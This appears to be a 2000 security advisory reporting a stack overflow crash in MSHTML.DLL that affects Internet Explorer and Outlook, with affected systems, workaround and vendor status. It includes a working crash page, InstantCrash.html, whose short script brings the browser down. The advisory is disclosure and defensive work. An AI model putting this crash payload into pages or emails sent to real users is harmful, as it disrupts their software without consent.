Stack Overflow in MSHTML.DLL

[Thor Larholm <thor () JUBII DK>]

Stack Overflow in MSHTML.DLL

Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled emailreaders).
Reliably tested on IE4.0 and higher on any Windows system, with any servicepacks
and patches.
Older versions of MSHTML.DLL may be affected too, but remains untested.

Risk: Low/Medium

Description:
MSHTML.DLL crashes with a Stack Overflow from simple scripting.

Details:
The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.

Code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------

Workaround:
Disable Active Scripting.

Vendor status:
Microsoft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be adressed in a future SP
for IE.

--
Thor Larholm